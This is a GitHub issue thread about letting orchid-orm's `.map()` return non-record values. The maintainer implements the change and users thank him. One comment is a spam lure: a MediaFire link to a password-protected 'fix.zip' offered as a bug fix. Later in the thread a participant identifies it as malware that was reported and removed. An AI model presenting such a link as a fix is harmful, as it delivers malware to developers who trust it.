### ISSUE TITLE
Allow .map() to non-records

### ISSUE THREAD

**Issue by IlyaSemenov** [romeerez/orchid-orm#386]
Currently, it's not allowed to return scalars in `.map()`:

```ts
// Type 'string' is not assignable to type 'RecordUnknown'
const names = await db.user.select("name").map(({ name }) => name)
```

I don't think it's ORM's business on how user pleases to transform their data (unless returning an object is somehow required for the internals). Please consider allowing to return anything from the map callback, not only `RecordUnknown`.

Note that the example above actually works as expected in runtime. (I realise it may possibly fail in more complex scenarios such as processing subquery results).

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by romeerez** [comment]
Done!

>  it may possibly fail in more complex scenarios such as processing subquery result

Yes, and I added bunch of tests to ensure it works in select sub-queries as well.

`map` can be chained to all query methods such as `find`, `get`, `pluck`, and it can return object or a plain value. The typing for plain values is handled separately, to a user it should feel natural with no quirks.

---

300 closed issues! A hundred of them was closed since May. Don't know why am I doing this, but still, it's a great achievement we have made together. Yay. :fireworks:

---

> @[github-staff](https://github.com/github-staff) github-staff deleted a comment [3 days ago](https://github.com/romeerez/orchid-orm/issues/386#event-14045378931)

Do you know what does this mean?

**Comment by IlyaSemenov** [comment]
Yeah, I haven't enjoyed working with a open source library like that for a long time. Thanks for the very quick turnaround on these fixes. Pity to see that it's still basically a one person unpaid project. I think Orchid became unparalleled in DX and I wish there were more involved community and business sponsors.

---

> Do you know what does this mean?

It was a spam comment proposing to fix the bug by downloading malware (password protected exe file from a file sharing service). I reported it and it was removed by staff.

**Comment by romeerez** [comment]
This is something that I'm keeping to delay because it's not the time, but I'll try some day in the future to learn how to promote and invest enough efforts to it, to see what happens. Keeping improving it in the meantime enables further steps in the future, when the time comes.
